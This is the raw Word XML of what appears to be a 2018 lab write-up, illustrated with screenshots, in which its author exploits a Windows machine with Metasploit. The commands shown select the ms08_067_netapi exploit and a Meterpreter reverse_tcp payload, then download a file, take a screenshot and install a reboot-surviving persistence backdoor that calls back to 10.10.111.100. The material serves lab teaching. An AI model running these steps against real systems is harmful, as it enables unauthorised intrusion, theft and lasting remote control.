    <w:p w14:paraId="59CD1FE4" w14:textId="77777777" w:rsidR="00987C5A" w:rsidRDefault="00987C5A" w:rsidP="003C23C9">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="751BFE15" w14:textId="0D066FE5" w:rsidR="00AC4941" w:rsidRDefault="00987C5A" w:rsidP="003C23C9">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AC4941">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4AFF5605" wp14:editId="4093CFA3">
            <wp:extent cx="5080635" cy="390709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2112" cy="39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3B4" w14:textId="579E032B" w:rsidR="00AC4941" w:rsidRDefault="00AC4941" w:rsidP="003C23C9">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D947659" w14:textId="09B31080" w:rsidR="00643C00" w:rsidRDefault="00987C5A" w:rsidP="003C23C9">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Choosing the correct Exploit (use exploit/windows/smb/ms08_067_netapi)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="638D057A" w14:textId="53B3B903" w:rsidR="00643C00" w:rsidRDefault="00643C00" w:rsidP="003C23C9">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00643C00">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="30CD8A2C" wp14:editId="028D81A4">
            <wp:extent cx="4558745" cy="393240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1453" cy="39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4562" w14:textId="77777777" w:rsidR="005912E7" w:rsidRDefault="005912E7" w:rsidP="003C23C9">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="358CC084" w14:textId="47BC2894" w:rsidR="00987C5A" w:rsidRDefault="00987C5A" w:rsidP="003C23C9">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Setting the properties:</w:t>
      </w:r>
      <w:r w:rsidR="00C91D1D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> (set RHOST [windows IP]).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64B1ACDF" w14:textId="7327D89D" w:rsidR="005912E7" w:rsidRDefault="005912E7" w:rsidP="003C23C9">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005912E7">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5AADEE27" wp14:editId="24ACDE06">
            <wp:extent cx="5001366" cy="3545840"/>
            <wp:effectExtent l="0" t="0" r="254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1837" cy="35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F6DD" w14:textId="186D9946" w:rsidR="00987C5A" w:rsidRDefault="00987C5A" w:rsidP="003C23C9">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Choosing the payload: </w:t>
      </w:r>
      <w:r w:rsidR="00C91D1D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>(set payload windows/meterpreter/reverse_tcp)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A0748C" w14:textId="3181AB52" w:rsidR="00987C5A" w:rsidRDefault="00987C5A" w:rsidP="003C23C9">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00987C5A">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="56962674" wp14:editId="576AD202">
            <wp:extent cx="5309235" cy="37391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1147" cy="37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8554" w14:textId="77777777" w:rsidR="000D5E00" w:rsidRDefault="000D5E00" w:rsidP="003C23C9">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B79E937" w14:textId="24001878" w:rsidR="000D5E00" w:rsidRDefault="000D5E00" w:rsidP="003C23C9">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Set the listening port and ip:</w:t>
      </w:r>
      <w:r w:rsidR="00C91D1D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> (set LHost [Linux IP]) (I left the listening port the same at 4444).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EF4CD00" w14:textId="0675EF1F" w:rsidR="000D5E00" w:rsidRDefault="000D5E00" w:rsidP="003C23C9">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D5E00">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="75633ACC" wp14:editId="0D9671EE">
            <wp:extent cx="5943600" cy="3081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144" w14:textId="77777777" w:rsidR="000D5E00" w:rsidRDefault="000D5E00" w:rsidP="003C23C9">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1319E0C0" w14:textId="77777777" w:rsidR="000D5E00" w:rsidRDefault="000D5E00" w:rsidP="003C23C9">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62CFD70D" w14:textId="77777777" w:rsidR="000D5E00" w:rsidRDefault="000D5E00" w:rsidP="003C23C9">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A79FB7E" w14:textId="77777777" w:rsidR="000D5E00" w:rsidRDefault="000D5E00" w:rsidP="003C23C9">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="091AB3DB" w14:textId="32B78BC9" w:rsidR="000D5E00" w:rsidRDefault="000D5E00" w:rsidP="003C23C9">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Began the exploit:</w:t>
      </w:r>
      <w:r w:rsidR="00C91D1D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> (exploit)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60729759" w14:textId="65C92B60" w:rsidR="000D5E00" w:rsidRDefault="000D5E00" w:rsidP="003C23C9">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D5E00">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7191EBAC" wp14:editId="7448EBBC">
            <wp:extent cx="5943600" cy="22212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C099" w14:textId="77777777" w:rsidR="008736FB" w:rsidRDefault="008736FB" w:rsidP="003C23C9">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25F3AC96" w14:textId="77777777" w:rsidR="008736FB" w:rsidRDefault="008736FB" w:rsidP="003C23C9">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1030CBD7" w14:textId="467A6FD7" w:rsidR="008736FB" w:rsidRDefault="008736FB" w:rsidP="003C23C9">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Got ipconfig and Shell Access</w:t>
      </w:r>
      <w:r w:rsidR="00C91D1D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> (Ip config and shell)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B08A650" w14:textId="1BDB7034" w:rsidR="008736FB" w:rsidRDefault="008736FB" w:rsidP="003C23C9">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008736FB">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4C6C497D" wp14:editId="358166E3">
            <wp:extent cx="5943600" cy="452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ACD4" w14:textId="77777777" w:rsidR="00E901A4" w:rsidRDefault="00E901A4" w:rsidP="003C23C9">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5881128A" w14:textId="77777777" w:rsidR="00E901A4" w:rsidRDefault="00E901A4" w:rsidP="003C23C9">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6AB10F16" w14:textId="77777777" w:rsidR="00E901A4" w:rsidRDefault="00E901A4" w:rsidP="003C23C9">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="259CA426" w14:textId="3611429A" w:rsidR="00E901A4" w:rsidRDefault="00E901A4" w:rsidP="003C23C9">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Created a text document in Windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05520187" w14:textId="2B6A688D" w:rsidR="00E901A4" w:rsidRDefault="0020577C" w:rsidP="003C23C9">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0020577C">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2C39C277" wp14:editId="23E8AD15">
            <wp:extent cx="4623435" cy="294151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4414" cy="29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88B7" w14:textId="77777777" w:rsidR="003C30B4" w:rsidRDefault="003C30B4" w:rsidP="003C23C9">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3044CF2E" w14:textId="6221726E" w:rsidR="003C30B4" w:rsidRDefault="003C30B4" w:rsidP="003C23C9">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Took a couple tries but downloaded the file.</w:t>
      </w:r>
      <w:r w:rsidR="00C91D1D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> (download [file directory] [linux directory]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BC33391" w14:textId="77777777" w:rsidR="0020577C" w:rsidRDefault="0020577C" w:rsidP="003C23C9">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="789CC31A" w14:textId="18B2CA60" w:rsidR="0020577C" w:rsidRDefault="003C30B4" w:rsidP="003C23C9">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C30B4">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1E0A9679" wp14:editId="6E1EF882">
            <wp:extent cx="5943600" cy="396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0A6" w14:textId="77777777" w:rsidR="003C30B4" w:rsidRDefault="003C30B4" w:rsidP="003C23C9">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02945CCE" w14:textId="77777777" w:rsidR="003C30B4" w:rsidRDefault="003C30B4" w:rsidP="003C23C9">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10B8FEEA" w14:textId="77777777" w:rsidR="003C30B4" w:rsidRDefault="003C30B4" w:rsidP="003C23C9">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="479D2593" w14:textId="382FD24F" w:rsidR="00251578" w:rsidRDefault="00251578" w:rsidP="003C23C9">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Screenshot saved:</w:t>
      </w:r>
      <w:r w:rsidR="00C91D1D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> (screenshot)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B8CC515" w14:textId="16D8B7BF" w:rsidR="00251578" w:rsidRDefault="00251578" w:rsidP="003C23C9">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00251578">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="130DDDFA" wp14:editId="2FA22B76">
            <wp:extent cx="5943600" cy="8502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1E7D" w14:textId="77777777" w:rsidR="00251578" w:rsidRDefault="00251578" w:rsidP="003C23C9">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20177BF9" w14:textId="6CE058AE" w:rsidR="00251578" w:rsidRDefault="00251578" w:rsidP="003C23C9">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00251578">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="75B6F8AE" wp14:editId="6B1CAE14">
            <wp:extent cx="5943600" cy="3522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BB5" w14:textId="77777777" w:rsidR="00AB0D9D" w:rsidRDefault="00AB0D9D" w:rsidP="003C23C9">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34CFA8D3" w14:textId="77777777" w:rsidR="00C91D1D" w:rsidRDefault="00C91D1D" w:rsidP="003C23C9">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D8C84B1" w14:textId="77777777" w:rsidR="00C91D1D" w:rsidRDefault="00C91D1D" w:rsidP="003C23C9">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32CB2C34" w14:textId="77777777" w:rsidR="00C91D1D" w:rsidRDefault="00C91D1D" w:rsidP="003C23C9">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="376B9FAE" w14:textId="77777777" w:rsidR="00C91D1D" w:rsidRDefault="00C91D1D" w:rsidP="003C23C9">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36D9B96B" w14:textId="77777777" w:rsidR="00C91D1D" w:rsidRDefault="00C91D1D" w:rsidP="003C23C9">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59AB043A" w14:textId="77777777" w:rsidR="00C91D1D" w:rsidRDefault="00C91D1D" w:rsidP="003C23C9">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10CE146B" w14:textId="77777777" w:rsidR="00C91D1D" w:rsidRDefault="00C91D1D" w:rsidP="003C23C9">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4CF1FD33" w14:textId="77777777" w:rsidR="00C91D1D" w:rsidRDefault="00C91D1D" w:rsidP="003C23C9">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A8B6D6F" w14:textId="77777777" w:rsidR="00C91D1D" w:rsidRDefault="00C91D1D" w:rsidP="003C23C9">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51F22858" w14:textId="77777777" w:rsidR="00C91D1D" w:rsidRDefault="00C91D1D" w:rsidP="003C23C9">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52029CE5" w14:textId="77777777" w:rsidR="00C91D1D" w:rsidRDefault="00C91D1D" w:rsidP="003C23C9">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4949F0BB" w14:textId="77777777" w:rsidR="00C91D1D" w:rsidRDefault="00C91D1D" w:rsidP="003C23C9">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34A51338" w14:textId="77777777" w:rsidR="00C91D1D" w:rsidRDefault="00C91D1D" w:rsidP="003C23C9">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BDF2AA7" w14:textId="77777777" w:rsidR="00C91D1D" w:rsidRDefault="00C91D1D" w:rsidP="003C23C9">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B74244D" w14:textId="77777777" w:rsidR="00C91D1D" w:rsidRDefault="00C91D1D" w:rsidP="003C23C9">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21158C79" w14:textId="77777777" w:rsidR="00C91D1D" w:rsidRDefault="00C91D1D" w:rsidP="003C23C9">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72D20CC9" w14:textId="77777777" w:rsidR="00AB0D9D" w:rsidRDefault="00AB0D9D" w:rsidP="003C23C9">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F4179A5" w14:textId="5BE1EBF5" w:rsidR="00AB0D9D" w:rsidRDefault="00AB0D9D" w:rsidP="003C23C9">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Persistence Installed:</w:t>
      </w:r>
      <w:r w:rsidR="00C91D1D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> (run persistence –A –L C:\\Windows =P windows/meterpreter/reverse_tcp –S –X 20 –p 4444 –r 10.10.111.100)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA3ED34" w14:textId="77777777" w:rsidR="00C91D1D" w:rsidRDefault="00C91D1D" w:rsidP="003C23C9">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DE4AE3F" w14:textId="601AE06A" w:rsidR="00AB0D9D" w:rsidRDefault="00AB0D9D" w:rsidP="003C23C9">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB0D9D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="02201BE7" wp14:editId="145E04D1">
            <wp:extent cx="5423535" cy="345113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8038" cy="34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7313" w14:textId="77777777" w:rsidR="00563E8D" w:rsidRDefault="00563E8D" w:rsidP="003C23C9">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="091178D9" w14:textId="11FDF34B" w:rsidR="00563E8D" w:rsidRDefault="00563E8D" w:rsidP="003C23C9">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Upon Reboot, reopened.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0674236C" w14:textId="75EB750D" w:rsidR="00563E8D" w:rsidRPr="003C23C9" w:rsidRDefault="00563E8D" w:rsidP="003C23C9">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00563E8D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="78F6A578" wp14:editId="43FF7D36">
            <wp:extent cx="5160251" cy="3660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5763" cy="36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3E8D" w:rsidRPr="003C23C9" w:rsidSect="00445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825ECA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EA185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EB7D52"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7E3894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0A3"/>
    <w:rsid w:val="000D5E00"/>
    <w:rsid w:val="001100A3"/>
    <w:rsid w:val="001B60B0"/>
    <w:rsid w:val="001C4F3B"/>
    <w:rsid w:val="0020577C"/>
    <w:rsid w:val="00251578"/>
    <w:rsid w:val="00377014"/>
    <w:rsid w:val="003C23C9"/>
    <w:rsid w:val="003C30B4"/>
    <w:rsid w:val="003F50AC"/>
    <w:rsid w:val="00445084"/>
    <w:rsid w:val="00505C40"/>
    <w:rsid w:val="00563E8D"/>
    <w:rsid w:val="005912E7"/>
    <w:rsid w:val="00614040"/>
    <w:rsid w:val="00643C00"/>
    <w:rsid w:val="00652FF5"/>
    <w:rsid w:val="00706E52"/>
    <w:rsid w:val="00723446"/>
    <w:rsid w:val="00771B88"/>
    <w:rsid w:val="008736FB"/>
    <w:rsid w:val="00987C5A"/>
    <w:rsid w:val="00A264E4"/>
    <w:rsid w:val="00AB0D9D"/>
    <w:rsid w:val="00AC4941"/>
    <w:rsid w:val="00B047C6"/>
    <w:rsid w:val="00C651C2"/>
    <w:rsid w:val="00C91D1D"/>
    <w:rsid w:val="00C93F49"/>
    <w:rsid w:val="00D21215"/>
    <w:rsid w:val="00E05AEA"/>
    <w:rsid w:val="00E901A4"/>
    <w:rsid w:val="00FC5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3579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00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252</Words>
  <Characters>1443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Ho</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>David Ho</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <cp:lastPrinted>2018-10-30T11:31:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-10-30T11:31:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-10-30T11:37:00Z</dcterms:modified>
</cp:coreProperties>
</file>